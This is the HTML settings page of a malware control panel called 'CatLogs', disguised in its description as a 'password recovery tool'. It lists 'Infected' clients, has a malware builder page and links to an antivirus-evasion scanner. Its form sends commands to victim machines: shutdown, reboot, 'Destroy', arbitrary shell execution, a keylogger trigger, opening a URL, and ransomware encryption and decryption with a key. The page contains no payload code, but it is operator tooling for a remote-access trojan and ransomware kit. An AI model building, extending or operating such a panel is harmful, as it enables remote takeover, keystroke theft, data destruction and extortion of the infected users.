<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <title>CatLogs – Settings</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="The best password recovery tool">
    <meta name="robots" content="noindex, nofollow, noarchive, nosnippet">
    <meta name="googlebot" content="noindex">
    <meta name="googlebot-news" content="nosnippet">
    <link rel="stylesheet" href="../../assets/style.css">
    <link rel="stylesheet" href="../../assets/boxicons.css">
    <script src="../../assets/jquery.js"></script>
</head>

<body cz-shortcut-listen="true">
    <div class="sidebar">
        <div class="logo-details">
            <img class="logo" src="../../assets/cat.png" alt="DuckLogs">
            <span class="logo_name">CatLogs</span>
        </div>
        <ul class="nav-links">
            <li>
                <a href="/dashboard">
                    <i class="bx bx-grid-alt"></i>
                    <span class="link_name">Dashboard</span>
                </a>
                <ul class="sub-menu blank">
                    <li><a class="link_name" href="/dashboard">Dashboard</a></li>
                </ul>
            </li>
            <li>
                <div class="iocn-link">
                    <a href="/clients">
                        <i class="bx bx-bug"></i>
                        <span class="link_name">Infected</span>
                    </a>
                    <i class="bx bxs-chevron-down arrow"></i>
                </div>
                <ul class="sub-menu">
                    <li><a class="link_name" href="/clients">Infected</a></li>
                    <li><a href="/clients">Clients</a></li>
                </ul>
            </li>

            <li>
                <div class="iocn-link">
                    <a href="/builder">
                        <i class="bx bx-wrench"></i>
                        <span class="link_name">Build</span>
                    </a>

                </div>

            </li>
            <li>
                <a href="https://antiscan.me/" target="_blank">
                    <i class="bx bx-check-shield"></i>
                    <span class="link_name">Scanner</span>
                </a>
                <ul class="sub-menu blank">
                    <li><a class="link_name" href="https://antiscan.me/" target="_blank">Scanner</a></li>
                </ul>
            </li>
            <li>
                <div class="iocn-link">
                    <a href="/settings">
                        <i class="bx bx-cog"></i>
                        <span class="link_name">Settings</span>
                    </a>
                    <i class="bx bxs-chevron-down arrow"></i>
                </div>
                <ul class="sub-menu">
                    <li><a class="link_name" href="/settings">Settings</a></li>
                    <li><a href="/settings">General</a></li>
                </ul>
            </li>
            <li>
            </li>

            <li>
                <div class="profile-details">
                    <div class="profile-content">
                        <img src="https://www.nulled.to/uploads/profile/photo-4668197.png" alt="profileImg">
                    </div>
                    <div class="name-job">
                        <div class="profile_name">Default</div>
                        <div class="job">User</div>
                    </div>
                    <a href="/logout"><i class="bx bx-log-out"></i></a>
                </div>
            </li>
        </ul>
    </div>

    <div class="container" style="padding-top: 40px;">
        <form method="POST" action="/c">
            <div class="b-upgrade">
                <div class="bar-upgrade">
                    <a> System</a>
                </div>

                <div class="buy" style="padding-top: 40px;">
                    <input type="submit" class="button" name="Shutdown" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Shutdown">
                </div>

                <div class="buy">
                    <input type="submit" class="button" name="Reboot" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Reboot">
                </div>

                <div class="buy">
                    <input type="submit" class="button" name="Destroy" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Destroy">
                </div>

                <div class="buy" style="padding-top: 10px;">
                    <input type="text" class="input" name="cmd" placeholder="Command">

                </div>

                <div class="buy">
                   

                        <input type="submit" class="button" name="shell" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Execute Shell">
                </div>

            </div>

            <div class="b-upgrade">
                <div class="bar-upgrade">
                    <a> Others</a>
                </div>
                <div class="buy" style="padding-top: 40px;">
                    

                    <input type="submit" class="button" name="keylogger" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Trigger Keylogger">
                </div>

                <div class="buy">
                    

                    <input type="submit" class="button" name="lock" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Delete Lock">
                </div>

                <div class="buy" style="padding-top: 10px;">
                    <input type="text" class="input" name="url" placeholder="Url">

                </div>

                <div class="buy">
                    

                    <input type="submit" class="button" name="oUrl" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Open Url">
                </div>
            </div>

            <div class="b-upgrade">
                <div class="bar-upgrade">
                    <a> Ransomware</a>
                </div>
                <div class="buy" style="padding-top: 40px;">
                    <input type="text" class="input" name="key" placeholder="Key">

                </div>

                <div class="buy">
                    

                    <input type="submit" class="button" name="Encrypt" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Encrypt">
                </div>

                <div class="buy">

                    <input type="submit" class="button" name="Decrypt" data-shoppy-product="nnWnlak" style="background-color: #323232;" value="Decrypt">
                </div>
            </div>

        </form>
    </div>
    <script src="../../assets/sideBar.js"></script>


</body>

</html>